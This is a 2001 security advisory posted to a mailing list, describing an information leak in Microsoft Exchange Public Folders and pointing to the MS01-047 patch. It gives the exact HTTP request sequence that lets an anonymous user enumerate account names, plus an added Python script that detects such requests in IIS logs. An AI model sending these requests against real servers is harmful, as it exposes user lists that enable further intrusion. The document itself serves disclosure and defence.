Exchange Public Folders Information Leakage

From: Aviram Jenik (aviram@BEYONDSECURITY.COM)
Date: 09/07/01


Message-ID:  <00d301c13782$bb0ea5a0$fe01a8c0@aviram>
Date:         Fri, 7 Sep 2001 11:51:52 +0200
From: Aviram Jenik <aviram@BEYONDSECURITY.COM>
Subject:      Exchange Public Folders Information Leakage
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com

SUMMARY

Microsoft Exchange Server handles anonymous access to its Public Folders
insecurely. While administrators may disable the "Find Users" feature to
prevent anonymous users from enumerating existing user names, a security
flaw in Exchange Server allows remote attackers with access to the
Exchange server to run "Find Users".

DETAILS

The "Find Users" option of Microsoft Exchange's Public Folders can be
disabled. This, however, does not prevent users from directly accessing
the ASP page (fumsg.asp). The link to "Find Users" will be hidden, but
it is still possible to access the page programmatically.

Steps to recreate:
1) Contact:
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com

2) Access the redirected page, and resend the issued cookie.
GET /exchange/logonfrm.asp HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

3) Access the redirected page, and resend the issued cookie.
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

4) Issue this request to obtain a list of users with the letter 'a' in
their name (e.g. Administrator)
POST /exchange/finduser/fumsg.asp HTTP/1.1
Host: www.example.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=

Vendor status:
Microsoft was contacted on August 4, 2001. A security bulletin was
released on September 7, 2001.

Solution:
Microsoft has released a patch for this problem. See Microsoft Security
Bulletin MS01-047 for more information:
<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-047.asp>
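
Detection example (added here, not part of the original advisory or of
any Microsoft tooling): a log check that flags requests to fumsg.asp made
without an authenticated user name, and notes whether the same client
first used the root.asp?acs=anon entry point from the steps above. It
assumes IIS W3C extended logging with the fields shown in the #Fields
line; the log lines, addresses and status codes are constructed samples.

```python
"""Flag unauthenticated requests to the Exchange "Find Users" page in IIS logs."""
from collections import defaultdict

FIND_USERS = "/exchange/finduser/fumsg.asp"  # page named in the advisory
ANON_ENTRY = "/exchange/root.asp"            # anonymous entry point (acs=anon)

# Constructed sample (IIS W3C extended format); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2001-09-07 09:51:50 192.0.2.10 - GET /exchange/root.asp acs=anon 302
2001-09-07 09:51:51 192.0.2.10 - GET /exchange/logonfrm.asp - 302
2001-09-07 09:51:52 192.0.2.10 - GET /exchange/root.asp acs=anon 200
2001-09-07 09:51:53 192.0.2.10 - POST /exchange/finduser/fumsg.asp - 200
2001-09-07 09:51:54 192.0.2.10 - POST /Exchange/FindUser/fumsg.asp - 200
2001-09-07 10:02:11 198.51.100.7 CORP\\alice POST /exchange/finduser/fumsg.asp - 200
2001-09-07 10:05:40 203.0.113.5 - POST /exchange/finduser/fumsg.asp - 401
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the latest #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated lines
                yield dict(zip(fields, values))

def find_anonymous_lookups(text):
    """Return {client_ip: [hits]} for Find Users requests with no user name."""
    anon_clients = set()  # clients that requested root.asp?acs=anon
    findings = defaultdict(list)
    for r in parse_w3c(text):
        ip, stem = r["c-ip"], r["cs-uri-stem"].lower()  # IIS paths ignore case
        if stem == ANON_ENTRY and "acs=anon" in r["cs-uri-query"].lower():
            anon_clients.add(ip)
        elif stem == FIND_USERS and r["cs-username"] == "-":
            findings[ip].append({
                "time": f'{r["date"]} {r["time"]}',
                "status": r["sc-status"],
                "served": r["sc-status"].startswith("2"),
                "after_anon_logon": ip in anon_clients,
            })
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in find_anonymous_lookups(SAMPLE_LOG).items():
        print(f"{ip}: {len(hits)} hit(s), {sum(h['served'] for h in hits)} served")
```

On a server where "Find Users" has been disabled, any hit marked as
served is worth reviewing against the MS01-047 patch status of that host.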

ADDITIONAL INFORMATION
This security hole was discovered by Noam Rathaus
<mailto:noamr@securiteam.com>.
The information has been provided by SecuriTeam Experts
<mailto:experts@secuiteam.com>.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
